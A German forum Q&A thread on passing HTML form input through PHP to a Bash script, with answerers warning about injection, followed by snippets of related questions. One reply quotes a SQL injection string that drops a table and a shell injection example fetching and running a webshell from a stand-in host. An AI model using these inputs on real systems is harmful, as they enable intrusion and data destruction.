PHP + Bash?

Hi, ich würde gerne Werte in einem HTML Formular angeben, die über PHP an ein Bash Script übergeben werden... Beispiel:

Ich habe das HTML Input, wo man seine Mail eingeben soll... Dies wird über PHP in ein Bash Script übertragen, was dies in dem Sinne dann über echo im Terminal ausgibt...

4 Antworten

Lezurex

Von gutefrage auf Grund seines Wissens auf einem Fachgebiet ausgezeichneter Nutzer

PC, Computer, Technik

08.01.2022, 22:40

In eine Datei schreiben kannst du mit file_put_contents. Wenn du die Datei irgendwie bearbeiten willst, musst du die Datei erst mit file_get_contents lesen, deine Änderungen durchführen und die Datei dann wieder schreiben.

Mir erschliesst sich aber nicht so ganz, was dein Ziel ist. Wenn du ein Bash-Script via PHP ausführst, welches einfach nur ein echo enthält, bringt das rein gar nix. Wo soll denn das echo angezeigt werden? Das geht ja dann ins Nichts.

Zudem öffnest du damit eine massive Sicherheitslücke. Statt eine E-Mail kann man einfach frisch fröhlich ein paar andere Befehle eingeben, woran dein Server unter Umständen nicht sonderlich Freude dran hat. Man kann versuchen, die Eingaben zu filtern, meist gibts dann aber doch immer einen Weg, diesen Filter zu umgehen. Am besten wäre es einfach, wenn du dann dieses "Feature" gar nicht erst einbaust.

Woher ich das weiß:Berufserfahrung – Informatiker Applikationsentwicklung

Justman

Fragesteller

08.01.2022, 22:45

Nun ja, ich dachte mir das so, ich habe schon ein fertig geschriebenes Bash Script wie:

wget https://files.teamspeak-services.com/releases/server/3.13.6/teamspeak3-server_linux_amd64-3.13.6.tar.bz2
bunzip2 teamspeak3*
tar xvf teamspeak3*

Dieses Bash Script soll ausgeführt werden, wenn man im HTML Formular, TeamSpeak installieren über ein select wählt

Lezurex

08.01.2022, 22:46

@Justman

Und wo genau wird dort jetzt eine E-Mail-Adresse benötigt?

Justman

Fragesteller

08.01.2022, 22:50

@Lezurex

Das war nur ein Beispiel... Wenn ich beispielweise dies habe:

https://www.sinusbot.com/dl/sinusbot.current.tar.bz2
bunzip2 sinusbot*
tar xvf sinusbot

Soll auch da das Bash Script ausgeführt werden, wenn man im HTML Formular, jedoch Sinusbot installieren über ein select wählt... Dazu soll noch, bevor das Bash Scipt ausgeführt wird, ein weiteres Fenster erscheinen, in dem man beispielsweise ein Haken setzt, wodurch YouTubeDL mit installiert wird! Ist der Haken nicht gesetzt, dann wird YouTubeDL halt nicht mit installiert

Lezurex

08.01.2022, 22:57

@Justman

Das mit dem YouTubeDL-Haken würde ich dann clientseitig mit ein paar wenigen Zeilen Javascript machen.

Solange du aber keine Eingaben eines Nutzers direkt in irgendeiner Weise einer interpretierten Sprache weitergibst, besteht da eigentlich keine Gefahr mehr, vorausgesetzt, du hast selber keine Kacke programmiert xD

Um also ein Shell-Script auszuführen, kannst du shell_exec nutzen.

Übrigens: Ich empfände es für besser, wenn du das Tar-Archiv nur einmal runterlädst und dann die Dateien pro Aufruf des Scriptes einfach an ihren Zielort kopierst. Dadurch ersparst du dir, als auch Teamspeak und Sinusbot Bandbreite.

Justman

Fragesteller

08.01.2022, 23:00

@Lezurex

Mit dem shell_exec würde ich aber nur das Bash Scipt ausführen, wie wäre denn der Code, um das mit dem Häkchen weiterzugeben?

Lezurex

08.01.2022, 23:01

@Justman

Ich würde für die beiden Dinge (Sinusbot und YoutubeDL) zwei separate Scripts machen. Dadurch entfällt jede Angriffsmöglichkeit.

Justman

Fragesteller

08.01.2022, 23:03

@Lezurex

Schon, nur wie übergebe ich das? Wenn ich also den Haken setze, dass das Bash dies dann installiert? Sprich:

Haken gesetzt => YouTubeDL installieren

Haken nicht gesetzt => YouTubeDL nicht installieren

Muss man ja dem Bash Script ja irgendwie wissen lassen

Lezurex

08.01.2022, 23:08

@Justman

So wie man das bei Bash nunmal macht. $1 ist das erste Argument. Dieses nutzt du dann in deinem Bash-Script. Aber wie gesagt, einfach keine Benutzereingaben als Argument übergeben.

Justman

Fragesteller

09.01.2022, 10:42

@Lezurex

Nun ja, nur wie und wo verwende ich dieses $1? Wie wird das abgefragt?

Lezurex

09.01.2022, 10:49

@Justman

Das verwendest du in deinem Bash-Script. Wenn du Argumente übergibst, werden die dort rein gespeichert.

Justman

Fragesteller

09.01.2022, 10:54

@Lezurex

Ja, nur wie wäre da der PHP Code? Ich muss dem PHP Script ja sagen, dass es das Bash Script kontaktieren und die Werte übergeben soll

PhotonX

Von gutefrage auf Grund seines Wissens auf einem Fachgebiet ausgezeichneter Nutzer

Computer

08.01.2022, 22:35

Warum lässt du die Daten nicht direkt von PHP verarbeiten und ins Terminal ausgeben?

Justman

Fragesteller

08.01.2022, 22:36

Wie? In dem PHP Script baue ich einfach ein HTML Formular, was ansich egal ist, da über action dies sowieso erst in ein anderes PHP Script übergeben werden muss... Oder?

PhotonX

08.01.2022, 22:36

@Justman

Genau, das Formular muss nicht mal selbst eine PHP-Datei sein, kann auch einfach nur eine HTML-Datei sein.

Justman

Fragesteller

08.01.2022, 22:39

@PhotonX

Ist halt noch die Frage, wie das Bash Script das abfängt...

PhotonX

08.01.2022, 22:41

@Justman

Der Vorschläg wäre es, gar kein Bash ins Spiel zu bringen. Wenn du es schon von Bash ausgeben lassen möchtest, kannst du die Daten in eine Datei auf dem Server schreiben und die dann von Bash ausgeben lassen (mit cat, watch usw).

NackterGerd

08.05.2022, 23:30

@Justman

Für Formulare brauchst du erstmal nur HTML - geht natürlich auch mit PHP.

Die Auswertung machst du danach mit PHP.

Und die Anzeige kannst du doch gleich im PHP der Auswertung machen

NackterGerd

08.05.2022, 23:20

Wozu brauchst du ein Bash-Script um um Daten auszugeben.

Warum nicht gleich PHP verwenden

Justman

Fragesteller

08.05.2022, 23:24

Da dieses Bashscript auf einem anderen Server liegen soll und die Werte erfässt

NackterGerd

09.05.2022, 21:31

@Justman

Und warum läuft auf den anderen Server dann nicht PHP?

Mit PHP kannst du die Daten erfassen, speichern und ausgeben.

Mit Bash-Script kannst du die Daten nicht auf anderen Server ubertragen

LeCux

08.01.2022, 22:36

Why? https://www.php.net/manual/de/function.fwrite.php

Eingaben bitte nie ungefiltert und unvalidiert weiter verarbeiten, das geht oft schief und öffnet Hackern Tür und Tor.

Justman

Fragesteller

08.01.2022, 22:38

Was hat das mit dem Werten von dem HTML Formular in das Bash Script übergeben zu tun?

LeCux

08.01.2022, 22:49

@Justman

https://www.php.net/manual/en/function.shell-exec.php

Das geht alles.

Aber das was der User Dir schickt solltest Du immer wie rohe Eier behandeln. Nicht selten hat eine böswillige Eingabe irgendwas seltsames angerichtet:

SQL Injection z.B.

Example

txtUserId = getRequestString("UserId");

txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;

And the following input:

User id:

The valid SQL statement would look like this:

Result

SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers;

Oder Spaß mit Shell:

Ich bestelle einmal `wget http://foo.bar/webshell && nohup webshell` - bitte Grün verpacken.

Bash und andere Shells interpretieren Dinge. Da muss man vorsichtig sein.

NackterGerd

09.05.2022, 21:34

@Justman

Was das mit dem Formular zu tun hat?

Sehr viel, wenn die Daten ungeprüft verarbeitet werden ist es möglich in deine Webseite einzudringen und dort Unfug zu machen

NackterGerd

09.05.2022, 21:32

👍👍

Ich habe eine, mit PHP dynamisch erzeugte Tabelle. In dieser Tabelle möchte ich die ID aus der ersten Spalte auslesen, die einem bestimmten Datensatz innerhalb meiner Datenbank zugeordnet ist. Wenn ich auf eine besstimmte Zeile klicke möchte ich auch die ID aus dieser Zeile haben. Diese soll wiederum an ein Popup übergeben werden, damit ich innerhalb dieses Popups Daten aus meiner Datenbank auslesen kann. Anbei findet ihr noch Bilder zu meiner Tabelle und dem Popup. Ich freue mich über jede Hilfe, bin schon seit Stunden am suchen.

    <form>
    <tr onclick="dialogOeffnen('loslegen-dialog')">
    <td>
            <?php echo $row["ID"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Vorname"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Nachname"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Vorname2"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Nachname2"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Vorname3"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Nachname3"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Vorname4"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Nachname4"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Titel"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Standort"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Klasse"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Beginn"] . "<br>"; ?>
          </td>
          <td>
            <?php echo $row["Abgabe"] . "<br>"; ?>
          </td>
          <td>
            <center><a href=<?php echo "uploads/" . $FileActualName?>">Link</a></center>
          </td>
          <td>
            <input  type="submit" onclick="dialogOeffnen('loslegen-dialog')" value="<?php echo $row["Genehmigt"]?>">
          </td>
          <td>
            <?php echo $row["Erstellt"] . "<br>"; ?>
          </td>
      </tr>
  </form>

Aktuell wird immer nur der Titel der letzten Zeile übergeben.

...zur Frage

PHP + SQL - PHP Registrierung?

Hi, suche einen Code, der in einer bestehenden Tabelle einer MySQL Datenbank Variablen einführt... Als Beispiel Nickname und Kennwort. Dazu halt ein HTML Formular...

...zur Frage

Mit PHP und HTML Formular Mysql Datensatz ändern?

Hallo Leute! Ich suche einen Script, mit dem man per Formular Datensätze verändern kann! Ich habe jetzt schon alle Scripts helfen mir dabei, mit einem Formular Datensätze verändern kann!

...zur Frage

Mit php gesamten html-Code übertragen?

Hallo,

ich habe eine php-Seite 1, die eine Website ausgibt. Jetzt möchte ich den gesamten html-Code dieser Website auf eine php-Seite 2 übertragen. Hat jemand eine Idee, wie ich das machen kann?

...zur Frage

"BMI-Rechner" mit HTML/PHP programmieren

ich soll ein programm schreiben mit 2 input boxen für gewicht und größe und das mit nem php script verknüpfen, welches anhand eines "switch"-befehls den BMI berechnet und danach auswirft :/

...zur Frage

linux crontab führt bash shell script nicht richtig aus?

Hallo,

ich will über einen crontab eine bash shell script ausführen lassen. innerhalb des Bash shell scriptes werden Python scripte mit Pfadangaben als Argumente zur Datien die diese einlesen sollen übergeben. Danach werden im selben Verzeichniss Dateien auf Basis der eingelesenen Dateien erstellt. Zur Kontrolle habe ich innerhalb des Scriptes ein Echo befehl den ich in eine Log Datei schreiben lasse. Das Problem ist das der Echo befehl in die Log Datei geschrieben wird aber es werden nicht die Datieen erzeugt die erstellt werden sollen. Ich habe das Skript ohne crontab also manuell ./bashshellscript.sh getestet, da funktioniert es einwandfrei. Weiß jemmand woran das ligen könnte?

Das Script:

#!/bin/bash

echo 'philipstestausgabe'

sicherung=Sicherungen\_Philips\_mdm

mkdir -p $sicherung

array=()

while IFS= read -r -d $'\0'; do

array+=("$REPLY")

done < <(find . -name "*.mdm" -exec cp '{}' Sicherungen_Philips_mdm/ \; )

for var in "${array[@]}"

python3 Simple_XML_HLSeven_Converter.py $var $sicherung

python3 HL7_Generator.py $var $sicherung

done

der crontab

* * * * * /home/vmfr/philips/philips.sh >> /home/vmfr/philips/xy.log 2>&1

...zur Frage

Linux .sh in neuem Terminal ausführen?

Hey, ich habe ein Shell Script das ein programm öffnet (Code: soffice tabelle.xlsx),

das Problem ist das wenn das Programm geöffnet wird dasw shell script auf pause ist (Es maczht nicht weiter im code bis das programm geschlossen wird) also bin ich auf die idee gekommen das ich den befehl zum öffnen von dem Programm einfach in einem extra Terminal machen könnte und um das programm wieder zu schließen das Terminal einfach schließe. Aber wie kann ich einen befehl in einem extra Terminal öffnen?
Hier mein Code:

#!/bin/bash

valid=true

count="tabelle.xlsx"

while [ $valid ]

echo "Opening "$count

soffice tabelle.xlsx

echo "Going to sleep"

sleep 10s

killall soffice.bin

echo "Killed "$count

done

...zur Frage

PHP Formular nach Klicken des Submit Buttons nicht löschen

Hallo

Ich programmiere mit HTML und PHP einen Zeitrechner, wo man die Zahlen in ein Formular schreibt, und möchte gerne, dass nach dem Submit-Button keine Daten aus dem Formular gelöscht werden.

Beim Suchen bin ich darauf gestossen:

<tr>
    <td nowrap>1. Zeit</td>
    <td align="right">
        <input type="text" name="d1" style="text-align:right;" value="<?php echo $_POST['d1']; ?>">
    </td>
    <td align="right">
        <input type="text" name="h1" style="text-align:right;" value="<?php echo $_POST['h1']; ?>">
    </td>
    <td align="right">
        <input type="text" name="m1" style="text-align:right;" value="<?php echo $_POST['m1']; ?>">
    </td>           
    <td align="right">
        <input type="text" name="s1" style="text-align:right;" value="<?php echo $_POST['s1']; ?>">
    </td>
</tr>

Das Problem dabei ist, das dabei immer eine Fehlermeldung kommt (Bild im Anhang). Was mache ich, damit die weggeht?

Vielen Dank für eure Antworten!

Phippe

...zur Frage

[jQuery AJAX] echo mit HTML Content von PHP Datei ausgeben?

Okay, die Frage ist evtl ein bisschen kompliziert. Deshalb beschreibe ich das anhand eines Beispiels. Zuerst meine Dateien:

PHP (submit.php)

<?php
 $mail = $_GET['mail']; if(filter_var($mail, FILTER_VALIDATE_EMAIL)) { echo "<div role=\"alert\">Ungültige E-Mail</div>"; } else { echo "<div role=\"alert\">Gültige E-Mail</div>"; }

?>

HTML (index.html)

<form id="myForm">
  <input type="email" name="mail" id="mail" placeholder="E-Mail Adresse"/>
  <input type="submit" name="check" id="check" value="Senden"/>
</form>
<script src="http://code.jquery.com/jquery-1.9.1.js"/> <script> $(function () { $('form').on('submit', function (e) { e.preventDefault(); $.ajax({ type: 'post', url: 'submit.php', data: $('form').serialize(),   success: function() {    //echo "Gültige E-Mail    } error: function() { //echo "Ungültige E-Mail" } }); }); }); </script>

Beschreibung:

Sobald das Formular abgesendet wurde, wird die E-Mail an die submit.php gesendet. In dieser wird überprüft, ob die E-Mail gültig ist und gibt dann das Ergebnis in Form von HTML-Code zurück.

Die Lösung mit alert will ich nicht. Es soll unterhalb der Form das Ergebnis stehen.

Wenn ich mit PHP

echo "<div role=\"alert\">Gültige E-Mail</div>";

ausgebe, dann steht das auch direkt in HTML dort (also nicht als PlainText).

Wie ist es also möglich, das Ergebnis der submit.php zu bekommen und in der index.html auszugeben?

Vielen Dank im Voraus!

...zur Frage

Variable in HTML Formular Dropdown übergeben?

Hallo zusammen,

ich möchte ein HTML Formular mit einem Dropdown Menü erstellen, wo man mit einer Text Eingabe eine Auswahlmöglichkeit zum Drop Down Menü hinzufügen können soll.

Also Bsp.: Ich habe eine Auswahl von 3 Optionen im DropDown, dann gibt der User in ein eingabe Feld eine weitere Option ein, drückt submit und hat dann 4 Optionen zur Auswahl, eine davon von ihm selbst.

Hoffe ihr könnt mir weiterhelfen:)

...zur Frage

PHP Code in Echo Statement?

Hallo, bei mir wird durch ein php-script eine seite generiert. Meine Frage ist: Ich möchte in der generierten PHP-Datei (mit HTML, CSS-Content) einen Code einbauen. Sodass man zum Beispiel eine Seite generiert und sich vorher z.B. durch ne Session anmelden muss. (durch einen header, nicht seitensintegriert) Da die Ausgabe und Erstellung des Kontexts auf ECHO basiert, wäre meine Frage wie es möglich ist in eine PHP-Datei mit echo statement, einen PHP-Code für die nächste Seite zu integrieren. Sodass sozusagen auf jeder generierten Seite ein Login notwendig ist.

...zur Frage

PHP 7 / HTML: Post-Formular funktioniert nicht?

Kurz und knapp.

Mein HTML-Formular funktioniert nicht, sobald ich "method="post" " hinzufüge.

<form action=/sup/frage1.php" METHOD="post">
  Answer: <input type="text" name="answer" /><br />
  <input type="Submit" value="Absenden" />
</form>

Außerdem:

Wenn ich die "post"-Methode weglasse und die über die URL übergebe, bekomme ich die Daten nicht mit $GET['answer']. Aber warum?

Danke im Voraus

...zur Frage

Bash App starten?

Wenn ich im terminal: megasync eingebe um megasync zu starten, klappt das zwar, aber ich kann dann nicht weiterschreiben. Es ist als ob ein script ausgeführt wird. Ich kann deswegen im bash script von mir danach keine befehle mehr starten.

...zur Frage

bash sendmail echo: Zeilenumbruch?

wie kann ich in diese Zeile von meinem bash script ins echo ein Zeilenumbruch machen <br> und \n geht nicht!

echo "Zeile1 Zeile2" 2>&1 | sed '1!b;s/^/To: mail@example.com\nSubject:betreff\n\n/' | /usr/sbin/sendmail -t

...zur Frage

Was möchtest Du wissen?

Deine Frage stellen